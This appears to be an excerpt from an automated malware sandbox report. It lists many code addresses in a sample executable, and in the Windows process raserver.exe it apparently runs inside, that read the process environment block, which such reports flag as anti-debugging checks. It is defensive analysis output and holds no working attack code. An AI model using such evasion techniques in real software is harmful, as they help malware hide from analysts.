          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0099B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0099B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0099B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00999100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00999100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00999100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009B4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0099B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0099B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009CD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009CD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009CFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A4B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A4B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A68A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A65BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009A1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009A1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A4D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A5138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A5131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0099F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0099DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009C3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009C3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0099DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A68B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A514FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A68CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A6740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A6740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A6740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009CBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A2C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A2C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009B746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009CFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009CFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009C35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A48DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A68D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0099AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009B7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A13540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A60EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A60EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A60EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A146A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A2FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009C36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A4FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A68ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009A76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009C16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0099C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0099C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0099C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A4FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0099E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009A766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A6070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A6070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009CE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A2FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A2FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00994F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00994F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A68F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009AEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009AFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AFF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AFF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AFF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AC9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AD849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B5B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B98CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AFBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ADB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ADB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ADB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ADB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AE746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B82073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B91074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AFA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AE0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AE0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B469A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AFA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AEC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AFFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AFFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B78DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ACB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ACB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ACB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ADD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ADD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B4A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B98D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AE4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ACAD30 mov eax, dword ptr fs:[00000030h]
